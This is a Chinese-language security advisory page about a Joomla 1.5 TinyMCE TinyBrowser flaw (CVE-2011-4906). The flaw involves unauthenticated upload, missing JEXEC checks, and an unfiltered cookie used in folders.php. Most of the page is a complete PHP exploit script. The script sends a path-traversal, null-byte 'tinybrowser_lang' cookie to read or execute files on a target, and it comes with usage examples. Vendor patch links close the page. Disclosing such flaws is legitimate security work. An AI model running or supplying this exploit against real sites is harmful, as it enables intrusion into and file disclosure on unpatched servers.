安全研究
安全漏洞
Joomla! TinyMCE Editor TinyBrowser插件文件上传任意PHP代码执行漏洞
发布日期:2009-07-22
更新日期:2009-07-22
受影响系统:
Joomla! Joomla! 1.x描述:
CVE(CAN) ID: CVE-2011-4906
Joomla!是一款开放源码的内容管理系统(CMS)。
Joomla!在实现上存在多个安全漏洞,成功利用后可导致泄漏某些系统信息。这些漏洞源于TinyMCE编辑器允许未经身份验证的文件上传;某些文件缺失对JEXEC的检查;plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/config_tinybrowser.php内的 "tinybrowser_lang" cookie参数没有正确过滤即用在plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php内。
<*来源:Patrice Lazareff
Juan Galiana Lara
链接:http://secunia.com/advisories/35899
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Copyright (c) ITIX LTD
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
TITLE: Joomla 1.5.12 read/exec remote files
AUTHOR: Nikola Petrov (vp.nikola@gmail.com)
VERSION: 1.0
LICENSE: GNU General Public License
Platform: Joomla 1.5.12
Vulnerabilities discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)
Date: 27.08.2009
*/
print "\n\n#########################################################################\n";
print "# LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
print "# Date: 27.08.2009\n";
print "#########################################################################\n\n";
if($argc < 4) {
print "usage: php ". $argv[0] ." host path file [port] [debug]\n";
print "example: php ". $argv[0] ." localhost /j1512 ../../../../../../../../wamp/www/j1512/images/stories/duck.jpg 80 1\n";
exit();
}
$Host = $argv[1];
$Path = $argv[2] . '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php';
$File = $argv[3] . '%00';
empty($argv[4]) ? $Port = 80 : $Port = $argv[4];
empty($argv[5]) ? $Debug = 0 : $Debug = 1;
function HttpSend($aHost, $aPort, $aPacket) {
$Response = "";
if(!$Socket = fsockopen($aHost, $aPort)) {
print "Error connecting to $aHost:$aPort\n\n";
exit();
}
fputs($Socket, $aPacket);
while(!feof($Socket)) $Response .= fread($Socket, 1024);
fclose($Socket);
return $Response;
}
$Packet = "GET {$Path} HTTP/1.0\r\n";
$Packet .= "Host: {$Host}\r\n";
$Packet .= "Cookie: tinybrowser_lang={$File}\r\n";
$Packet .= "Connection: close\r\n\r\n";
if($Debug) {
print "Request to '$Host:$Port':\n";
print $Packet;
}
print HttpSend($Host, $Port, $Packet);
?>
建议:
厂商补丁:
Joomla!
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://developer.joomla.org/security/
Joomla:
http://developer.joomla.org/security/news/301-20090722-core-file-upload.html
http://developer.joomla.org/security/news/302-20090722-core-missing-jexec-check.html
浏览次数:2973
严重程度:0(网友投票)
绿盟科技给您安全的保障